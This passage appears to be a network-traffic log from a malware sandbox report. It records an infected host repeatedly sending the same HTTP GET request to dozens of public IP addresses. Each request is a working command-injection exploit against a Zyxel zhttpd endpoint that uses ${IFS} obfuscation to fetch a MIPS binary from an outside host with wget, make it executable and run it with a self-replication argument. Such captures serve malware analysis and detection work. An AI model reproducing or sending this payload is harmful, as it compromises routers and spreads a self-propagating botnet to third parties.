                                                Jan 12, 2024 18:24:54.307701111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9071192.168.2.134934441.244.54.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307770967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9072192.168.2.134918638.191.255.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307825089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9073192.168.2.1359204181.158.253.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307866096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9074192.168.2.1339142162.166.22.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307941914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9075192.168.2.134451242.124.132.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.307980061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9076192.168.2.135124298.176.34.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308056116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9077192.168.2.1356552175.102.77.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308116913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9078192.168.2.1346548102.118.52.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308161020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9079192.168.2.135878253.110.251.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308192968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9080192.168.2.1343490154.214.164.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308264017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9081192.168.2.133685242.219.176.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308334112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9082192.168.2.1335634200.29.102.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308410883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9083192.168.2.135956067.219.36.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308443069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9084192.168.2.1338092143.157.216.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308481932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9085192.168.2.13433748.81.133.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308523893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9086192.168.2.134148243.8.55.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308569908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9087192.168.2.1350518141.61.96.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308620930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9088192.168.2.13517868.193.130.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308676004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9089192.168.2.1341732197.196.94.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308751106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9090192.168.2.134857667.253.20.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308799982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9091192.168.2.1346132191.99.231.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308856010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9092192.168.2.1343024142.55.190.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308917999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9093192.168.2.135540627.36.162.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.308979988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9094192.168.2.1358276140.213.192.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309020042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9095192.168.2.135370274.9.150.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309075117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9096192.168.2.1352958185.80.243.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309125900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9097192.168.2.134890262.8.244.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309185028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9098192.168.2.135791882.107.33.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309231043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9099192.168.2.1359676101.72.89.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309259892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9100192.168.2.1351194204.129.14.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309344053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9101192.168.2.134347054.217.102.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309398890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9102192.168.2.1339744158.201.3.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309427023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9103192.168.2.1338146119.131.139.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309521914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9104192.168.2.133784496.14.28.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309562922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9105192.168.2.1340702212.124.181.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309623003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9106192.168.2.1360048197.18.251.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309664965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9107192.168.2.135417232.218.40.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309746981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9108192.168.2.1344140134.79.254.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309776068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9109192.168.2.135296272.26.14.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309849024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9110192.168.2.1340914198.237.223.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309897900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9111192.168.2.136018696.129.126.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309921026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9112192.168.2.133843094.137.249.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.309962034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9113192.168.2.1347662107.93.21.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310038090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9114192.168.2.135214838.109.50.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310079098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9115192.168.2.13506602.158.10.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310142994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9116192.168.2.1334612120.116.253.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310187101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9117192.168.2.1351666104.188.9.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310249090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9118192.168.2.134844068.219.113.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310329914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9119192.168.2.1345374126.251.155.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310369968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9120192.168.2.135674417.12.159.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310425997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9121192.168.2.133328881.103.188.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310460091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9122192.168.2.1338326133.207.37.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310516119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9123192.168.2.13453149.220.54.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310540915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9124192.168.2.1357042185.161.67.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310610056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9125192.168.2.1343480216.213.183.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310677052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9126192.168.2.135019443.16.23.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310736895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9127192.168.2.1333032148.100.162.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310781956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9128192.168.2.1335410106.97.8.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310842037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9129192.168.2.133788448.141.45.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310864925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9130192.168.2.13341648.252.125.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310933113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9131192.168.2.1351312154.43.37.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.310982943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9132192.168.2.134468653.163.202.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.311026096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9133192.168.2.1356680129.41.250.52443
                                                TimestampBytes transferredDirectionData
